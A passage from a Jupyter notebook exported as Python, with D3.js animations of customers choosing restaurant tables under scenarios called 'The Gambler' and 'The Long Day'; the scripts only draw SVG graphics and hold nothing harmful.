Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,3,svg5)\n }\n social4()\n</script>')
# In[9]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="social5()" value="Run Animation">\n<div id="social5"></div>\n\n<script type="text/javascript"> \n function social5() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#social5").select("svg").remove()\n var svg6 = d3.select("div#social5").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg6.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg6.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["4/4","0","0","0","0"]\n svg6.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg6.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,4,svg6)\n }\n social5()\n</script>')
# ### 2. The Gambler
#
# The Gambler is the person who only cares about the probabilites. Meaning, if there is two tables (xx), then they have a 50/50 choice, and they do not care at all about the people sitting there or not.
# In[10]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler1()" value="Run Animation">\n<div id="gambler1"></div>\n\n<script type="text/javascript"> \n function gambler1() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#gambler1").select("svg").remove()\n var svg7 = d3.select("div#gambler1").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg7.selectAll("line")\n .data(d3.range(1))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg7.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/1","0","0","0","0"]\n svg7.selectAll("text")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg7.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n gambler1()\n</script>')
# In[11]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler2()" value="Run Animation">\n<div id="gambler2"></div>\n\n<script type="text/javascript"> \n function gambler2() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler2").select("svg").remove()\n var svg8 = d3.select("div#gambler2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg8.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg8.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/2","1/2","0","0","0"]\n svg8.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg8.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed")\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed")\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg8)\n }\n gambler2()\n</script>')
# In[12]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler3()" value="Run Animation">\n<div id="gambler3"></div>\n\n<script type="text/javascript"> \n function gambler3() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler3").select("svg").remove()\n var svg9 = d3.select("div#gambler3").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n fractions = ["1/3","1/3","1/3","0","0"]\n svg9.selectAll("line")\n .data(d3.range(3))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg9.selectAll("circle")\n // Collect\n .data(fractions)\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (+d!=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n \n svg9.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg9.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg9,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg9,1)\n }\n gambler3()\n</script>')
# In[13]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler4()" value="Run Animation">\n<div id="gambler4"></div>\n\n<script type="text/javascript"> \n function gambler4() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler4").select("svg").remove()\n var svg10 = d3.select("div#gambler4").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n fractions = ["1/4","1/4","1/4","1/4","0"]\n svg10.selectAll("line")\n .data(d3.range(4))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg10.selectAll("circle")\n // Collect\n .data(fractions)\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (+d!=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n \n svg10.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg10.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg10,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg10,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg10,2)\n }\n gambler4()\n</script>')
# In[14]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="gambler5()" value="Run Animation">\n<div id="gambler5"></div>\n\n<script type="text/javascript"> \n function gambler5() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#gambler5").select("svg").remove()\n var svg11 = d3.select("div#gambler5").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n fractions = ["1/5","1/5","1/5","1/5","1/5"]\n svg11.selectAll("line")\n .data(d3.range(5))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg11.selectAll("circle")\n // Collect\n .data(fractions)\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (+d!=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n \n svg11.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg11.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg11,0)\n var cx = ((radius) * Math.cos(x(1))) + (width/2)\n var cy = ((radius) * Math.sin(x(1))) + (height-margin)\n addPeople(cx,cy,1,svg11,1)\n var cx = ((radius) * Math.cos(x(2))) + (width/2)\n var cy = ((radius) * Math.sin(x(2))) + (height-margin)\n addPeople(cx,cy,1,svg11,2)\n var cx = ((radius) * Math.cos(x(3))) + (width/2)\n var cy = ((radius) * Math.sin(x(3))) + (height-margin)\n addPeople(cx,cy,1,svg11,3)\n }\n gambler5()\n</script>')
# ### 3. The Long Day
#
# The Long Day scenerio describes a situation where customers (xx) coming into the restraunt had a reeeeeeeeeeeeeeeally long day. All they want is a table (xx) to themselves to eat their food, pay, and go home. This is the opposite of the Social Butterfly, where if there are people at a table (😃 & xx). They will find an empty table (xxx).
#
# In[15]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long1()" value="Run Animation">\n<div id="long1"></div>\n\n<script type="text/javascript"> \n function long1() {\n var width = 500\n var height = 270\n var margin = 35\n var radius = 200\n \n d3.select("div#long1").select("svg").remove()\n var svg12 = d3.select("div#long1").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg12.selectAll("line")\n .data(d3.range(1))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg12.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=0)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["1/1","0","0","0","0"]\n svg12.selectAll("text")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg12.append("text")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n }\n long1()\n</script>')
# In[16]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long2()" value="Run Animation">\n<div id="long2"></div>\n\n<script type="text/javascript"> \n function long2() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long2").select("svg").remove()\n var svg13 = d3.select("div#long2").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg13.selectAll("line")\n .data(d3.range(2))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg13.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=1)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","1/1","0","0","0"]\n svg13.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n .transition("text")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n \n \n \n svg13.append("text")\n .attr("class","hungry")\n .attr("x", width/2)\n .attr("y", (height-margin))\n .style("font-size","50px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text("🤔")\n \n function addPeople(cx,cy,e,s,c) {\n var xc = d3.scaleLinear().domain([0,d3.range(e).length]).range([Math.PI, 3*Math.PI])\n s.selectAll("text.feed_"+c)\n // Collect\n .data(d3.range(e))\n // Update\n .join("text")\n .attr("class","feed_"+c)\n .attr("x", cx)\n .attr("y", cy) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>"😃")\n .transition("text2")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x", (d,i)=> ((40) * Math.cos(xc(i))) + cx)\n .attr("y", (d,i)=> ((40) * Math.sin(xc(i))) + cy)\n \n \n }\n var cx = ((radius) * Math.cos(x(0))) + (width/2)\n var cy = ((radius) * Math.sin(x(0))) + (height-margin)\n addPeople(cx,cy,1,svg13,0)\n\n }\n long2()\n</script>')
# In[17]:
get_ipython().run_cell_magic('html', '', '<input type="button" onclick="long3()" value="Run Animation">\n<div id="long3"></div>\n\n<script type="text/javascript"> \n function long3() {\n var width = 600\n var height = 300\n var margin = 55\n var radius = 200\n \n d3.select("div#long3").select("svg").remove()\n var svg14 = d3.select("div#long3").append("svg")\n .attr("width", width)\n .attr("height", height)\n\n var x = d3.scaleLinear().domain([0,d3.range(5).length-1]).range([Math.PI, 2*Math.PI])\n\n svg14.selectAll("line")\n .data(d3.range(3))\n .join("line")\n .attr("x1", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y1", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("x2", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("stroke","darkgrey")\n .style("stroke-width", "10px")\n .style("stroke-linecap","round")\n .transition("line")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("x2", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("y2", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin)) \n\n svg14.selectAll("circle")\n // Collect\n .data(d3.range(5))\n // Update\n .join("circle")\n .attr("cx", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .attr("r", (d,i)=> 30)\n .style("fill", (d,i)=> (i<=2)?"white":"black")\n .style("stroke", "black")\n .style("stroke-width", "1px")\n .transition("circle")\n .duration(1000)\n .delay((d,i)=> i * 100)\n .attr("cx", (d,i)=> ((radius) * Math.cos(x(i))) + (width/2))\n .attr("cy", (d,i)=> ((radius) * Math.sin(x(i))) + (height-margin))\n\n fractions = ["0","0","2/2","0","0"]\n svg14.selectAll("text.perc")\n // Collect\n .data(fractions)\n // Update\n .join("text")\n .attr("class","perc")\n .attr("x", (d,i)=> ((0) * Math.cos(x(i))) + (width/2))\n .attr("y", (d,i)=> ((0) * Math.sin(x(i))) + (height-margin)) \n .style("font-size","30px")\n .style("text-anchor", "middle")\n .style("alignment-baseline","middle")\n .text(d=>d)\n 